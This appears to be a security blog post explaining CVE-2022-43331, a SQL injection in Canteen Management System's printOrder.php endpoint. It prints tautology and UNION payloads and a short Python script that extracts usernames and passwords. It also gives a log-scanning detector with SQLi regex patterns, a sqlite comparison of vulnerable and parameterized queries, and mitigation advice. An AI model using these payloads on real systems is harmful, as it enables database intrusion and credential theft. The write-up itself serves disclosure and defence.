In late 2022, a serious SQL injection vulnerability was uncovered in Canteen Management System v1., which is a popular web-based application for managing canteen orders and inventory. Tracked as CVE-2022-43331, this issue permits attackers to inject malicious SQL via the id parameter on the /php_action/printOrder.php endpoint. This post breaks down how the vulnerability works, demonstrates an exploit, and gives practical advice for mitigation—using straightforward language for broad accessibility.
What is CVE-2022-43331?
CVE-2022-43331 is a security flaw in the Canteen Management System v1. where user-supplied data feeds unsanitized into SQL queries. Specifically, the id parameter on the printOrder.php page is not properly checked or sanitized. Malicious users can manipulate this to run their own SQL commands on the database.
References
- CVE Details - CVE-2022-43331
- Exploit Database ID 51011
- Original Disclosure
Where's the Problem?
The file /php_action/printOrder.php is meant to display printable order summaries based on the supplied order id (usually from a GET request). However, the code is naive and simply drops the id value straight into the SQL query, like so:
// php_action/printOrder.php (v1.)
$id = $_GET['id'];
$sql = "SELECT * FROM orders WHERE order_id = $id";
$result = mysqli_query($conn, $sql);
// ...process $result and output...
What's missing?
Input validation and sanitization are missing. There’s no check to see if id contains valid or safe input.
An attacker can alter the SQL query by supplying crafted input in the id parameter, like this:
http://example.com/php_action/printOrder.php?id=1 OR 1=1
This changes the SQL statement to:
SELECT * FROM orders WHERE order_id = 1 OR 1=1
The OR 1=1 always evaluates to true, so all orders are revealed instead of just one.
Suppose an attacker wants to pull user credentials. They could expand the injection into a UNION query:
http://example.com/php_action/printOrder.php?id=1 UNION SELECT 1, username, password, 4 FROM users--
Now the SQL executed by the database looks like:
SELECT * FROM orders WHERE order_id = 1
UNION
SELECT 1, username, password, 4 FROM users--
If the number and types of the columns match those of the orders table (or can be guessed), the response will include usernames and password hashes alongside the order data.
Exploit Demonstration
Here’s how a hacker might automate extracting sensitive data with Python and the popular requests library:
import requests
# Target URL
url = "http://example.com/php_action/printOrder.php"
# Malicious payload
payload = "1 UNION SELECT 1, username, password, 4 FROM users-- "
# Make request
params = {'id': payload}
response = requests.get(url, params=params)
# Show the response (would contain leaked user data)
print(response.text)
Replace http://example.com with the address of the vulnerable system.
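On the defensive side, the same request pattern that the exploit above produces is easy to pick out of web server access logs, because a legitimate order id is a plain integer and never contains SQL keywords, comment markers or quotes. The following scanner is an added example written for this post; it is not code from Canteen Management System or from the original disclosure. The log lines are constructed for the demo in Apache/nginx "combined" format, and the endpoint path is the one named on this page.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlparse

# Constructed sample access-log lines for the demo (not from any real server).
# Line 2 carries the "1 OR 1=1" payload URL-encoded; line 3 the UNION payload.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Nov/2022:19:15:02 +0000] "GET /php_action/printOrder.php?id=42 HTTP/1.1" 200 1843
203.0.113.7 - - [01/Nov/2022:19:15:09 +0000] "GET /php_action/printOrder.php?id=1%20OR%201%3D1 HTTP/1.1" 200 91233
203.0.113.7 - - [01/Nov/2022:19:15:21 +0000] "GET /php_action/printOrder.php?id=1+UNION+SELECT+1,username,password,4+FROM+users-- HTTP/1.1" 200 5120
198.51.100.4 - - [01/Nov/2022:19:16:00 +0000] "GET /index.php HTTP/1.1" 200 512
"""

# Fields of a "combined"-style request line: client IP, timestamp, method, target, status, bytes.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)

# Tokens that have no business in an integer order id: set operators, tautologies,
# SQL comment openers, string delimiters and statement separators.
SQLI_MARKERS = re.compile(
    r"(\bUNION\b|\bSELECT\b|\bOR\b\s+\d+\s*=\s*\d+|--|/\*|'|;)", re.IGNORECASE
)

VULNERABLE_PATH = "/php_action/printOrder.php"


def is_suspicious_id(value: str) -> bool:
    """True when the id is not a plain integer and carries SQL-looking tokens.

    The value is decoded once more so a double-encoded payload is still seen.
    """
    decoded = unquote_plus(value)
    if decoded.strip().isdigit():
        return False
    return bool(SQLI_MARKERS.search(decoded))


def scan_log(text: str) -> list[dict]:
    """Return one finding per request to printOrder.php whose id looks injected."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        if not url.path.endswith(VULNERABLE_PATH):
            continue
        # parse_qs already percent-decodes and turns '+' into spaces.
        for raw_id in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if is_suspicious_id(raw_id):
                findings.append({
                    "ip": m["ip"],
                    "ts": m["ts"],
                    "id": unquote_plus(raw_id),
                    "status": m["status"],
                    # A response far larger than a normal single-order page is a
                    # secondary signal that the tautology dumped the whole table.
                    "bytes": m["bytes"],
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} id={f['id']!r} status={f['status']} bytes={f['bytes']}")
```

Run against a real log, the scanner would be pointed at the access log file instead of SAMPLE_LOG; the two flagged lines above are exactly the tautology and UNION requests, while the normal id=42 request and the unrelated index.php hit pass through untouched.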
Mitigation
1. Use Parameterized Queries
The number one defense is using parameterized queries or prepared statements:
// Secure version
$id = $_GET['id'];
$sql = "SELECT * FROM orders WHERE order_id = ?";
$stmt = $conn->prepare($sql);
$stmt->bind_param("i", $id); // "i" stands for integer
$stmt->execute();
$result = $stmt->get_result();
2. Validate Input
Make sure input is valid before using it:
// Allow-list an integer id. FILTER_VALIDATE_INT is stricter than is_numeric(),
// which would also accept floats and exponent notation such as "1e3".
if (!isset($_GET['id']) || filter_var($_GET['id'], FILTER_VALIDATE_INT) === false) {
    die("Invalid ID");
}
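To see concretely why the two fixes above work, the following added example (written for this post, not code from the project) rebuilds the vulnerable query from the "Where's the Problem?" section and the parameterized plus validated version from this section side by side. It uses Python's sqlite3 module as a stand-in for MySQL; the orders and users tables, their rows and the hash strings are constructed for the demo and are not the application's real schema.

```python
import sqlite3

# Constructed sample schema and rows standing in for the application's MySQL tables.
SCHEMA = """
CREATE TABLE orders (order_id INTEGER PRIMARY KEY, customer TEXT, item TEXT, total REAL);
CREATE TABLE users  (user_id  INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
INSERT INTO orders VALUES (1, 'alice', 'coffee', 2.50), (2, 'bob', 'sandwich', 6.00), (3, 'carol', 'salad', 7.25);
INSERT INTO users  VALUES (1, 'admin', '$2y$10$constructed_hash_1', 'admin'), (2, 'staff', '$2y$10$constructed_hash_2', 'staff');
"""


def make_db() -> sqlite3.Connection:
    """Fresh in-memory database populated with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def print_order_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list[tuple]:
    """Mirrors the original printOrder.php: the raw id is spliced into the SQL text,
    so the database parses attacker-controlled text as part of the statement."""
    sql = f"SELECT * FROM orders WHERE order_id = {raw_id}"
    return conn.execute(sql).fetchall()


def print_order_parameterized(conn: sqlite3.Connection, raw_id) -> list[tuple]:
    """Prepared statement: '?' is bound as a value, never parsed as SQL.
    Even with no validation at all, '1 OR 1=1' is just a string that matches no id."""
    return conn.execute("SELECT * FROM orders WHERE order_id = ?", (raw_id,)).fetchall()


def validate_order_id(raw_id) -> int:
    """Allow-list check for a plain positive integer, the analogue of PHP's
    FILTER_VALIDATE_INT; rejects floats, exponent notation, whitespace and blanks."""
    if not isinstance(raw_id, str) or not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("Invalid ID")
    return int(raw_id)


def print_order_safe(conn: sqlite3.Connection, raw_id) -> list[tuple]:
    """Both defenses together: validate the input, then bind it."""
    return print_order_parameterized(conn, validate_order_id(raw_id))


if __name__ == "__main__":
    db = make_db()
    payloads = ["1", "1 OR 1=1", "1 UNION SELECT 1, username, password, 4 FROM users--"]
    for p in payloads:
        vuln = print_order_vulnerable(db, p)
        safe = print_order_parameterized(db, p)
        print(f"id={p!r}: vulnerable -> {len(vuln)} row(s), parameterized -> {len(safe)} row(s)")
```

The vulnerable function returns all three orders for the tautology and three rows including both usernames and hashes for the UNION payload, exactly the behaviour described earlier in this post. The parameterized function returns one row for a genuine id and zero rows for either payload, because the bound value is compared to order_id as data rather than re-parsed as SQL; the validated version additionally rejects the payloads up front with an error, which is the behaviour the PHP check above produces.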
3. Least Privilege
Limit database user privileges so injected statements can't do maximum damage.
4. Keep Updated
Regularly check for updates to your CMS and apply security patches.
Conclusion
CVE-2022-43331 is a classic but dangerous SQL injection in Canteen Management System v1.. If you’re running this system, patch immediately and use secure coding practices moving forward. SQL injection is entirely preventable with modern coding approaches.
More Information
- OWASP SQL Injection Reference
- Reporting CVE-2022-43331 on NIST
- GitHub PoC
Timeline
Published on: 11/01/2022 19:15:00 UTC
Last modified on: 11/01/2022 20:43:00 UTC